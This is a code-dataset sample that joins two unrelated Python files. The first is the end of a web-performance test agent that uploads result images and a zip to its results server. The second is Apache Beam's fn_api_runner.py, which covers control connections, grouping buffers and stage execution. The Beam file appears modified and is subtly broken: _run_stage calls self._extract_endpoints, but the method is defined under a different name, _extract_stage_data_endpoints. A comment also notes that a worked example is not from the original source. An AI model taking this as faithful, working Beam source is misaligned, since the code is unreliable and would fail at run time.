if self.key is not None:
data['key'] = self.key
if self.instance_id is not None:
data['ec2'] = self.instance_id
if self.zone is not None:
data['ec2zone'] = self.zone
needs_zip = []
zip_path = None
if os.path.isdir(task['dir']):
# upload any video images
if bool(self.job['video']) and len(task['video_directories']):
for video_subdirectory in task['video_directories']:
video_dir = os.path.join(task['dir'], video_subdirectory)
if os.path.isdir(video_dir):
for filename in os.listdir(video_dir):
filepath = os.path.join(video_dir, filename)
if os.path.isfile(filepath):
name = video_subdirectory + '/' + filename
if os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data,
filepath, task['prefix'] + '_' + filename):
os.remove(filepath)
else:
needs_zip.append({'path': filepath, 'name': name})
else:
needs_zip.append({'path': filepath, 'name': name})
# Upload the separate large files (> 100KB)
for filename in os.listdir(task['dir']):
filepath = os.path.join(task['dir'], filename)
if os.path.isfile(filepath):
# Delete any video files that may have squeaked by
if not self.job['keepvideo'] and filename[-4:] == '.mp4' and \
filename.find('rendered_video') == -1:
try:
os.remove(filepath)
except Exception:
pass
elif os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data, filepath, filename):
try:
os.remove(filepath)
except Exception:
pass
else:
needs_zip.append({'path': filepath, 'name': filename})
else:
needs_zip.append({'path': filepath, 'name': filename})
# Zip the remaining files
if len(needs_zip):
zip_path = os.path.join(task['dir'], "result.zip")
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_STORED) as zip_file:
for zipitem in needs_zip:
logging.debug('Storing %s (%d bytes)', zipitem['name'],
os.path.getsize(zipitem['path']))
zip_file.write(zipitem['path'], zipitem['name'])
try:
os.remove(zipitem['path'])
except Exception:
pass
# Post the workdone event for the task (with the zip attached)
if task['done']:
data['done'] = '1'
if task['error'] is not None:
data['error'] = task['error']
if cpu_pct is not None:
data['cpu'] = '{0:0.2f}'.format(cpu_pct)
logging.debug('Uploading result zip')
self.post_data(self.url + "workdone.php", data, zip_path, 'result.zip')
# Clean up so we don't leave directories lying around
if os.path.isdir(task['dir']):
try:
shutil.rmtree(task['dir'])
except Exception:
pass
if task['done'] and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
def post_data(self, url, data, file_path, filename):
"""Send a multi-part post"""
ret = True
# pass the data fields as query params and any files as post data
url += "?"
for key in data:
if data[key] is not None:
url += key + '=' + urllib.quote_plus(data[key]) + '&'
logging.debug(url)
try:
if file_path is not None and os.path.isfile(file_path):
self.session.post(url,
files={'file': (filename, open(file_path, 'rb'))},
timeout=300,)
else:
self.session.post(url)
except Exception:
logging.exception("Upload Exception")
ret = False
return ret
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
# pytype: skip-file
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
from builtins import object
from typing import TYPE_CHECKING
from typing import Any
from typing import Callable
from typing import DefaultDict
from typing import Dict
from typing import Iterable
from typing import Iterator
from typing import List
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
from typing import overload
import grpc
from typing_extensions import Protocol
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import metric
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricResult
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.transforms import environments
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindow
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
from apache_beam.utils import windowed_value
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
if TYPE_CHECKING:
from google.protobuf import message # pylint: disable=ungrouped-imports
from apache_beam.pipeline import Pipeline
from apache_beam.coders.coder_impl import CoderImpl
from apache_beam.coders.coder_impl import WindowedValueCoderImpl
from apache_beam.portability.api import metrics_pb2
from apache_beam.transforms.window import BoundedWindow
T = TypeVar('T')
ConstructorFn = Callable[[
Union['message.Message', bytes],
'FnApiRunner.StateServicer',
Optional['ExtendedProvisionInfo'],
'GrpcServer'
],
'WorkerHandler']
DataSideInput = Dict[Tuple[str, str],
Tuple[bytes, beam_runner_api_pb2.FunctionSpec]]
DataOutput = Dict[str, bytes]
BundleProcessResult = Tuple[beam_fn_api_pb2.InstructionResponse,
List[beam_fn_api_pb2.ProcessBundleSplitResponse]]
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
# Time-based flush is enabled in the fn_api_runner by default.
DATA_BUFFER_TIME_LIMIT_MS = 1000
_LOGGER = logging.getLogger(__name__)
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue(
) # type: queue.Queue[beam_fn_api_pb2.InstructionRequest]
self._input = None # type: Optional[Iterable[beam_fn_api_pb2.InstructionResponse]]
self._futures_by_id = dict() # type: Dict[str, ControlFuture]
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
@overload
def push(self, req):
# type: (BeamFnControlServicer.DoneMarker) -> None
pass
@overload
def push(self, req):
# type: (beam_fn_api_pb2.InstructionRequest) -> ControlFuture
pass
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
# type: () -> beam_fn_api_pb2.InstructionRequest
return self._push_queue.get()
def set_input(self, input):
# type: (Iterable[beam_fn_api_pb2.InstructionResponse]) -> None
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
# type: () -> None
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
class DoneMarker(object):
pass
_DONE_MARKER = DoneMarker()
def __init__(self):
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# The following self._req_* variables are used for debugging purposes;
# data is added only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(
ControlConnection) # type: DefaultDict[str, ControlConnection]
def get_conn_by_worker_id(self, worker_id):
# type: (str) -> ControlConnection
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self,
iterator, # type: Iterable[beam_fn_api_pb2.InstructionResponse]
context
):
# type: (...) -> Iterator[beam_fn_api_pb2.InstructionRequest]
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
raise RuntimeError(
'All workers communicating through gRPC should have a '
'worker_id. Received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
_LOGGER.debug(
'Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
_LOGGER.debug(
'Runner: Requests multiplexing info: %s',
[(str(req), worker)
for req, worker in self._req_worker_mapping.items()])
class Buffer(Protocol):
def __iter__(self):
# type: () -> Iterator[bytes]
pass
def append(self, item):
# type: (bytes) -> None
pass
class PartitionableBuffer(Buffer, Protocol):
def partition(self, n):
# type: (int) -> List[List[bytes]]
pass
class _ListBuffer(List[bytes]):
"""Used to support parititioning of a list."""
def partition(self, n):
# type: (int) -> List[List[bytes]]
return [self[k::n] for k in range(n)]
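# Worked example (not from the original source): partitioning
# [b'a', b'b', b'c', b'd', b'e'] with n=2 yields the strided slices
# [[b'a', b'c', b'e'], [b'b', b'd']].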
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self,
pre_grouped_coder, # type: coders.Coder
post_grouped_coder, # type: coders.Coder
windowing
):
# type: (...) -> None
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(
list) # type: DefaultDict[bytes, List[Any]]
self._windowing = windowing
self._grouped_output = None # type: Optional[List[List[bytes]]]
def append(self, elements_data):
# type: (bytes) -> None
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing else windowed_key_value.
with_value(value))
def partition(self, n):
# type: (int) -> List[List[bytes]]
""" It is used to partition _GroupingBuffer to N parts. Once it is
partitioned, it would not be re-partitioned with diff N. Re-partition
is not supported now.
"""
if not self._grouped_output:
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(
None,
timestamp=GlobalWindow().max_timestamp(),
pane_info=windowed_value.PaneInfo(
is_first=True,
is_last=True,
timing=windowed_value.PaneInfoTiming.ON_TIME,
index=0,
nonspeculative_index=0)).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
# TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock
# note that this only comes through if windowing is default - but what
# about having multiple firings on the global window.
# May need to revise.
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
self._grouped_output = [[] for _ in range(n)]
output_stream_list = []
for _ in range(n):
output_stream_list.append(create_OutputStream())
for idx, (encoded_key, windowed_values) in enumerate(self._table.items()):
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True)
for ix, output_stream in enumerate(output_stream_list):
self._grouped_output[ix] = [output_stream.get()]
self._table.clear()
return self._grouped_output
def __iter__(self):
# type: () -> Iterator[bytes]
""" Since partition() returns a list of lists, add this __iter__ to return
a list to simplify code when we need to iterate through ALL elements of
_GroupingBuffer.
"""
return itertools.chain(*self.partition(1))
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(
self,
access_pattern,
coder # type: coders.WindowedValueCoder
):
# type: (...) -> None
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
self._kv_extractor = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('') # type: coders.Coder
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extractor = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (coder.wrapped_value_coder.value_coder())
else:
raise ValueError("Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(
list) # type: DefaultDict[Tuple[str, BoundedWindow], List[Any]]
def append(self, elements_data):
# type: (bytes) -> None
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_val_coder_impl = self._windowed_value_coder.get_impl(
) # type: WindowedValueCoderImpl
windowed_value = windowed_val_coder_impl.decode_from_stream(
input_stream, True)
key, value = self._kv_extractor(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
# type: () -> Iterator[Tuple[bytes, bytes, bytes]]
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None, # type: Optional[environments.Environment]
bundle_repeat=0,
use_state_iterables=False,
provision_info=None, # type: Optional[ExtendedProvisionInfo]
progress_request_frequency=None):
# type: (...) -> None
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
progress_request_frequency: The frequency (in seconds) that the runner
waits before requesting progress from the SDK.
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment or environments.EmbeddedPythonEnvironment())
self._bundle_repeat = bundle_repeat
self._num_workers = 1
self._progress_frequency = progress_request_frequency
self._profiler_factory = None # type: Optional[Callable[..., profiler.Profile]]
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info or ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
retrieval_token='unused-retrieval-token'))
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self,
pipeline, # type: Pipeline
options # type: pipeline_options.PipelineOptions
):
# type: (...) -> RunnerResult
RuntimeValueProvider.set_runtime_options({})
# Setup "beam_fn_api" experiment options if lacked.
experiments = (
options.view_as(pipeline_options.DebugOptions).experiments or [])
if 'beam_fn_api' not in experiments:
experiments.append('beam_fn_api')
options.view_as(pipeline_options.DebugOptions).experiments = experiments
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
# TODO: Move group_by_key_input_visitor() to a non-dataflow specific file.
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._num_workers = options.view_as(
pipeline_options.DirectOptions).direct_num_workers or self._num_workers
# Set the direct workers' running mode if it is defined in the pipeline options.
running_mode = \
options.view_as(pipeline_options.DirectOptions).direct_running_mode
if running_mode == 'multi_threading':
self._default_environment = environments.EmbeddedPythonGrpcEnvironment()
elif running_mode == 'multi_processing':
command_string = '%s -m apache_beam.runners.worker.sdk_worker_main' \
% sys.executable
self._default_environment = environments.SubprocessSDKEnvironment(
command_string=command_string)
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
self._latest_run_result = self.run_via_runner_api(
pipeline.to_runner_api(default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
# type: (beam_runner_api_pb2.Pipeline) -> RunnerResult
stage_context, stages = self.create_stages(pipeline_proto)
# TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to
# the teststream (if any), and all the stages).
return self.run_stages(stage_context, stages)
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output([
'git', 'rev-parse', '--abbrev-ref', 'HEAD'
]).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
_LOGGER.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-import
if not subprocess.call([sys.executable,
'-m',
'gprof2dot',
'-f',
'pstats',
path,
'-o',
path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print(
'CPU Profile rendering at file://%s.svg' %
os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(
self,
pipeline_proto # type: beam_runner_api_pb2.Pipeline
):
# type: (...) -> Tuple[fn_api_runner_transforms.TransformContext, List[fn_api_runner_transforms.Stage]]
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[
fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders
],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
]),
use_state_iterables=self._use_state_iterables)
def run_stages(self,
stage_context, # type: fn_api_runner_transforms.TransformContext
stages # type: List[fn_api_runner_transforms.Stage]
):
# type: (...) -> RunnerResult
"""Run a list of topologically-sorted stages in batch mode.
Args:
stage_context (fn_api_runner_transforms.TransformContext)
stages (list[fn_api_runner_transforms.Stage])
"""
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(
_ListBuffer) # type: DefaultDict[bytes, PartitionableBuffer]
for stage in stages:
stage_results = self._run_stage(
worker_handler_manager.get_worker_handlers,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def _store_side_inputs_in_state(self,
worker_handler, # type: WorkerHandler
context, # type: pipeline_context.PipelineContext
pipeline_components, # type: beam_runner_api_pb2.Components
data_side_input, # type: DataSideInput
pcoll_buffers, # type: Mapping[bytes, PartitionableBuffer]
safe_coders
):
# type: (...) -> None
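"""Writes the materialized side-input data into the worker's state backend.
Each side input is grouped by window (and additionally by key for multimap
side inputs) and appended under the corresponding StateKey so that the SDK
worker can read it while processing the bundle.
"""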
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
if si.urn == common_urns.side_inputs.ITERABLE.urn:
for _, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
iterable_side_input=beam_fn_api_pb2.StateKey.IterableSideInput(
transform_id=transform_id, side_input_id=tag, window=window))
worker_handler.state.append_raw(state_key, elements_data)
elif si.urn == common_urns.side_inputs.MULTIMAP.urn:
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
transform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
worker_handler.state.append_raw(state_key, elements_data)
else:
raise ValueError("Unknown access pattern: '%s'" % si.urn)
def _run_bundle_multiple_times_for_testing(
self,
worker_handler_list, # type: Sequence[WorkerHandler]
process_bundle_descriptor,
data_input,
data_output, # type: DataOutput
get_input_coder_callable,
cache_token_generator
):
# type: (...) -> None
"""
If bundle_repeat > 0, replay every bundle for profiling and debugging.
"""
# all workers share state, so use any worker_handler.
worker_handler = worker_handler_list[0]
for k in range(self._bundle_repeat):
try:
worker_handler.state.checkpoint()
testing_bundle_manager = ParallelBundleManager(
worker_handler_list,
lambda pcoll_id: _ListBuffer(),
get_input_coder_callable,
process_bundle_descriptor,
self._progress_frequency,
k,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator)
testing_bundle_manager.process_bundle(data_input, data_output)
finally:
worker_handler.state.restore()
def _collect_written_timers_and_add_to_deferred_inputs(
self,
context, # type: pipeline_context.PipelineContext
pipeline_components, # type: beam_runner_api_pb2.Components
stage, # type: fn_api_runner_transforms.Stage
get_buffer_callable,
deferred_inputs # type: DefaultDict[str, PartitionableBuffer]
):
# type: (...) -> None
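"""Collects timers written by the previous bundle and queues them as inputs.
Only the last timer set per key and window is kept; the re-encoded timers
are added to ``deferred_inputs`` so they fire in a follow-up bundle.
"""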
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer_callable(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id] = _ListBuffer([out.get()])
written_timers[:] = []
def _add_residuals_and_channel_splits_to_deferred_inputs(
self,
splits, # type: List[beam_fn_api_pb2.ProcessBundleSplitResponse]
get_input_coder_callable,
input_for_callable,
last_sent,
deferred_inputs # type: DefaultDict[str, PartitionableBuffer]
):
# type: (...) -> None
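"""Queues residual roots and channel-split leftovers as deferred inputs.
Residual roots reported by the SDK are appended directly; for channel splits
the previously sent input is decoded and the unprocessed tail is re-encoded
and scheduled for the next bundle.
"""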
prev_stops = {} # type: Dict[str, int]
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[input_for_callable(
delayed_application.application.transform_id,
delayed_application.application.input_id)].append(
delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_callable(channel_split.transform_id)
# TODO(SDF): This requires deterministic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
all_elements = list(
coder_impl.decode_all(
b''.join(last_sent[channel_split.transform_id])))
residual_elements = all_elements[
channel_split.first_residual_element:prev_stops.
get(channel_split.transform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[channel_split.transform_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.transform_id] = channel_split.last_primary_element
@staticmethod
def _extract_stage_data_endpoints(
stage, # type: fn_api_runner_transforms.Stage
pipeline_components, # type: beam_runner_api_pb2.Components
data_api_service_descriptor,
pcoll_buffers # type: DefaultDict[bytes, PartitionableBuffer]
):
# type: (...) -> Tuple[Dict[Tuple[str, str], PartitionableBuffer], DataSideInput, Dict[Tuple[str, str], bytes]]
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {} # type: Dict[Tuple[str, str], PartitionableBuffer]
data_side_input = {} # type: DataSideInput
data_output = {} # type: Dict[Tuple[str, str], bytes]
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = _ListBuffer([ENCODED_IMPULSE_VALUE])
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[only_element(
transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[only_element(
transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
def _run_stage(self,
worker_handler_factory, # type: Callable[[Optional[str], int], List[WorkerHandler]]
pipeline_components, # type: beam_runner_api_pb2.Components
stage, # type: fn_api_runner_transforms.Stage
pcoll_buffers, # type: DefaultDict[bytes, PartitionableBuffer]
safe_coders
):
# type: (...) -> beam_fn_api_pb2.InstructionResponse
"""Run an individual stage.
Args:
worker_handler_factory: A ``callable`` that takes in an environment id
and a number of workers, and returns a list of ``WorkerHandler``s.
pipeline_components (beam_runner_api_pb2.Components): TODO
stage (fn_api_runner_transforms.Stage)
pcoll_buffers (collections.defaultdict of str: list): Mapping of
  PCollection IDs to lists that function as buffers for the
  ``beam.PCollection``.
safe_coders (dict): TODO
"""
def iterable_state_write(values, element_coder_impl):
# type: (...) -> bytes
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
worker_handler.state.append_raw(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
worker_handler_list = worker_handler_factory(
stage.environment, self._num_workers)
# All worker handlers share the same gRPC server, so we can read the server
# info from any of them; here we simply use the first one.
worker_handler = next(iter(worker_handler_list))
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = worker_handler.data_api_service_descriptor()
_LOGGER.info('Running %s', stage.name)
data_input, data_side_input, data_output = self._extract_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={
transform.unique_name: transform
for transform in stage.transforms
},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
state_api_service_descriptor = worker_handler.state_api_service_descriptor()
if state_api_service_descriptor:
process_bundle_descriptor.state_api_service_descriptor.url = (
state_api_service_descriptor.url)
